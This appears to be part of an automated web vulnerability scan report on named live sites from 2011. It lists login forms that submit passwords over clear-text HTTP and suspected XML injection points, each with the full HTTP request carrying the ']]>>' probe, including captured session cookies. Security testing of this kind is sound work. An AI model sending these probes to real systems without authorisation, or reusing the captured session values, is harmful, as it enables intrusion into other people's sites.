User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-360; jt_time=1296350654008; sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Fri, 26 Mar 2010 01:03:28 GMT
ETag: "1258584-113ed-482a9bb29b800"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=470797
Expires: Sat, 05 Feb 2011 01:54:30 GMT
Date: Sun, 30 Jan 2011 15:07:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 70637

// set global defaults
var pokeURL = typeof(globalPokeURL) != 'undefined' ? globalPokeURL : 'http://log.newsvine.com/poke.gif';
var imgRoot = typeof(globalImgRoot) != 'undefined' ? globalImgRoot : 'h
...[SNIP]...
</h3><form method="post" action="'+loginRoot+'">';
iHTML += '<input type="hidden" name="redirect" value="'+vine.session.webRoot+'/_nv/accounts/login" />
...[SNIP]...
<div>Password: <input type="password" name="password" style="width: 130px; margin-bottom: 5px" /></div>
...[SNIP]...

8.9. http://www.scientificamerican.com/blog/observations/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.scientificamerican.com
Path:	/blog/observations/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser

The form contains the following password field:

password

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211547;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: CFTOKEN=84610132;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211547;path=/
Set-Cookie: CFTOKEN=84610132;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211547%26CFTOKEN%23%3D84610132%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23hitcount%3D2%23cftoken%3D84610132%23cfid%3D155211547%23;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70039
Date: Sat, 29 Jan 2011 22:32:21 GMT
X-Varnish: 461255158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...
</h3>
       <form id="login" action="http://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser" class="asyncForm">
           <fieldset>
...[SNIP]...
<label for="password">
                   Password
                   <input type="password" id="password" value="" name="password" />
               </label>
...[SNIP]...

8.10. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.six-telekurs.com
Path:	/tkfich_index/tkfich_home.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

The form contains the following password field:

password

Request

GET /tkfich_index/tkfich_home.htm HTTP/1.1
Host: www.six-telekurs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:20 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8
Content-Type: text/html
Last-Modified: Sun, 30 Jan 2011 02:03:20 GMT
ETag: "74935320-01010000"
Expires: Sun, 30 Jan 2011 01:03:20 GMT
Cache-Control: no-cache
Content-Length: 26752
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://www.six
...[SNIP]...
<table cellspacing="0" cellpadding="0" border="0" align="center" width="100%">
<FORM name="myform" method="post" target="_top" onSubmit="Speichern(); return OnSubmitForm();">
<INPUT TYPE="HIDDEN" Name="FD_AUTH">
...[SNIP]...
<td class="stytextindex" valign="top" style="padding-left:3px"><INPUT TYPE="PASSWORD" NAME="password" size="9" VALUE="" MAXLENGTH="16" class="stytextindex"><img src="spacer.gif" width="1" height="16">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://circle.stylemepretty.com/wp-login.php

The form contains the following password field:

Request

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:03:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:25 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:03:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<div id="sign-in">
<form method="post" action="http://circle.stylemepretty.com/wp-login.php">
<input type="submit" value="Log In" id="log-in" name="wp-submit" />
...[SNIP]...
<input type="text" name="log" id="sign-in-username" />
<input type="password" name="pwd" id="sign-in-password" />
<input type="submit" value="Go" id="sign-in-btn" />
...[SNIP]...

8.12. http://www.unmannedspaceflight.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.unmannedspaceflight.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.unmannedspaceflight.com/index.php?s=47217f8154e2e2ad81f66ad14c4bf133&act=Login&CODE=01&CookieDate=1

The form contains the following password field:

PassWord

Request

GET / HTTP/1.1
Host: www.unmannedspaceflight.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:41 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
X-Powered-By: PHP/5.2.5
Set-Cookie: session_id=47217f8154e2e2ad81f66ad14c4bf133; path=/; httponly
Connection: close
Content-Type: text/html
Content-Length: 87221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<td align="right" valign="middle">

           <form action="http://www.unmannedspaceflight.com/index.php?s=47217f8154e2e2ad81f66ad14c4bf133&act=Login&CODE=01&CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="focus_username(this)" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="focus_password(this)" value="------" />
               <input class="button" type="image" src="style_images/ip.boardpr/login-button.gif" />
...[SNIP]...

8.13. http://www.zacks.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.zacks.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.zacks.com/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9. XML injection previous next
There are 27 instances of this issue:

http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php [REST URL parameter 1]
http://amch.questionmarket.com/adsc/d852149/4/864449/decide.php [REST URL parameter 1]
http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]
http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]
http://beacon.jump-time.net/jt.js [REST URL parameter 1]
http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [format parameter]
http://cdn-forums.scout.com/adfeed.ashx [format parameter]
http://edge.quantserve.com/quant.js [REST URL parameter 1]
http://forums.silverlight.net/user/viewonline.aspx [CSAnonymous cookie]
http://forums.silverlight.net/user/viewonline.aspx [CommunityServer-LastVisitUpdated-2101 cookie]
http://forums.silverlight.net/user/viewonline.aspx [omniID cookie]
http://forums.silverlight.net/user/viewonline.aspx [s_sq cookie]
http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [allowEmptySearch parameter]
http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [appid parameter]
http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [focusOnInit parameter]
http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [minimumTermLength parameter]
http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [overrideWatermark parameter]
http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [scopeid parameter]
http://img.widgets.video.s-redacted/resource.aspx [responseEncoding parameter]
http://platform.twitter.com/anywhere.js [REST URL parameter 1]
http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
https://security.live.com/LoginStage.aspx [lmif parameter]
http://services.money.redacted/QuoteService/dynamic [format parameter]
http://services.money.redacted/quoteservice/streaming [format parameter]
http://srv.admailtiser.com/pix/master_pixel.js [REST URL parameter 1]
http://srv.admailtiser.com/pix/master_pixel.js [REST URL parameter 2]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

9.1. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d775684/10/38973908/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adsc]]>>/d775684/10/38973908/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 19:29:46 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1065

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.2. http://amch.questionmarket.com/adsc/d852149/4/864449/decide.php [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d852149/4/864449/decide.php

Issue detail

Request

GET /adsc]]>>/d852149/4/864449/decide.php HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:50:21 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=929
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1065

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.3. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

Request

GET /adscgen]]>>/st.php HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:50:19 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=297
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1065

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.4. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/st.php]]>> HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:50:21 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=949
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1065

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.5. http://beacon.jump-time.net/jt.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://beacon.jump-time.net
Path:	/jt.js

Issue detail

Request

GET /jt.js]]>> HTTP/1.1
Host: beacon.jump-time.net
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F55C94ED4D496FCB
x-amz-id-2: j7IZdzHif9MWHZWPmA7QzUPNTESBHx6mW7kPTpbTPC1KkhLpKXrJe8ugl4eOagq+
Content-Type: application/xml
Date: Sun, 30 Jan 2011 01:41:46 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: acae02909e9941f48b2b7d9accc11e4d9dc109ed675ce971de7c52c61b60c666e71c858257a04206
Via: 1.0 24cd63caef97c959fcea23b44ee0f77c.cloudfront.net:11180 (CloudFront), 1.0 07a4270348f84154cfba6750f17515e7.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F55C94ED4D496FCB</RequestId><HostId>j7IZdzHif9MWHZWPmA7QzUPNTESBHx6mW7kPTpbTPC1KkhLpKX
...[SNIP]...

9.6. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-cms.scout.com
Path:	/feeds/analyticsfeed.ashx

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%27%26pid%3D88%26yr%3D2011&format=json]]>>&callback=$.analytics.report HTTP/1.1
Host: cdn-cms.scout.com
Proxy-Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:42:03 GMT
Connection: close
Akamai: True
Content-Length: 388

<analyticsfeed xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><network>Scout</network><site>recruiting</site><sports/><categories/><pagetype>Recruiting</pagetype><pagesubtype/><author/><dateoverr
...[SNIP]...

9.7. http://cdn-forums.scout.com/adfeed.ashx [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-forums.scout.com
Path:	/adfeed.ashx

Issue detail

Request

GET /adfeed.ashx?s=73&format=json]]>>&callback=$.showAd.cacheAdCodes HTTP/1.1
Host: cdn-forums.scout.com
Proxy-Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Mbrd6
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:42:14 GMT
Connection: close
Akamai: True
Content-Length: 455

<adFeed xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><ads><ad><code>SPTSN1</code><height>90</height><type>DISPLAY</type><width>728</width></ad><ad><code>SPTSN3</code><height>600</height><type>D
...[SNIP]...

9.8. http://edge.quantserve.com/quant.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://edge.quantserve.com
Path:	/quant.js

Issue detail

Request

GET /quant.js]]>> HTTP/1.1
Host: edge.quantserve.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EHAAG6ANq0itiBDbz6HJXbIAAboBAfYFgfQAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sun, 30 Jan 2011 17:29:29 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.9. http://forums.silverlight.net/user/viewonline.aspx [CSAnonymous cookie] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The CSAnonymous cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the CSAnonymous cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3]]>>; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 147568
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:00:06 GMT; expires=Mon, 30-Jan-2012 16:00:06 GMT; path=/
Set-Cookie: CSAnonymous=321b38d0-d73f-4f68-b4d9-58e7580c96ff; expires=Sun, 30-Jan-2011 16:20:06 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:00:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...
<a href="/forums/p/214911/508761.aspx">How to catch exceptions that occured in SOAP generated cs file (Reference.cs)? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

9.10. http://forums.silverlight.net/user/viewonline.aspx [CommunityServer-LastVisitUpdated-2101 cookie] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The CommunityServer-LastVisitUpdated-2101 cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the CommunityServer-LastVisitUpdated-2101 cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=]]>>; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 371633
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:50:02 GMT; expires=Mon, 30-Jan-2012 15:50:02 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:10:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:50:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...
<a href="/forums/p/156518/352181.aspx">How to read XML file using System.XML.LINQ and loop through nodes? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

9.11. http://forums.silverlight.net/user/viewonline.aspx [omniID cookie] previous next

Summary

Severity:	Medium
